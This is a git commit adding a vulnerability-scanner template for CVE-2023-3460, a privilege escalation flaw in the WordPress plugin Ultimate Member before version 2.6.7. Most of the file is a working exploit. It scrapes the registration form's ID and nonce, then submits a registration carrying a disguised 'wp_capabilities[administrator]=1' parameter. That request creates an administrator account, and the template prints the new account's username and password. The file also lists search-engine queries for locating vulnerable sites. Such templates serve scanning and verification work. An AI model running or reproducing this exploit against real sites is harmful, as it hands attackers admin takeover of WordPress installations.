Create CVE-2023-3460.yaml (#7704)

* Create CVE-2023-3460.yaml * misc update * Update CVE-2023-3460.yaml --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-07-16 15:20:13 +05:30 · 2023-07-16 15:20:13 +05:30 · 6426507ae8
parent 3af8e388e2
commit 6426507ae8
1 changed files with 101 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-3460.yaml
+++ b/http/cves/2023/CVE-2023-3460.yaml
@ -0,0 +1,101 @@
+id: CVE-2023-3460
+
+info:
+  name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
+  reference:
+    - https://github.com/gbrsh/CVE-2023-3460
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3460
+    - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7
+    - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/
+    - https://wordpress.org/plugins/ultimate-member/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-3460
+    cwe-id: CWE-269
+    epss-score: 0.00268
+    cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 4
+    verified: true
+    google-query: inurl:/wp-content/plugins/ultimate-member
+    publicwww-query: /wp-content/plugins/ultimate-member
+    vendor: ultimatemember
+    product: ultimate_member
+    framework: wordpress
+  tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan
+
+variables:
+  username: "{{rand_base(6)}}"
+  password: "{{rand_base(8)}}"
+  email: "{{randstr}}@{{rand_base(5)}}.com"
+  firstname: "{{rand_base(5)}}"
+  lastname: "{{rand_base(5)}}"
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /index.php/register/?{{version}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(to_lower(body_1), "ultimate member")
+          - regex("wordpress_logged_in_[a-z0-9]{32}", header_4)
+          - status_code_4 == 302
+        condition: and
+
+    extractors:
+      - type: regex
+        name: path
+        part: location_2
+        group: 1
+        regex:
+          - '([a-z:/.]+)'
+        internal: true
+
+      - type: regex
+        name: version
+        part: body_1
+        group: 1
+        regex:
+          - '(?i)Stable.tag:\s?([\w.]+)'
+        internal: true
+
+      - type: regex
+        name: formid
+        part: body_3
+        group: 1
+        regex:
+          - 'name="form_id" id="form_id_([0-9]+)"'
+        internal: true
+
+      - type: regex
+        name: wpnonce
+        part: body_3
+        group: 1
+        regex:
+          - 'name="_wpnonce" value="([0-9a-z]+)"'
+        internal: true
+
+      - type: dsl
+        dsl:
+          - '"WP_USERNAME: "+ username'
+          - '"WP_PASSWORD: "+ password'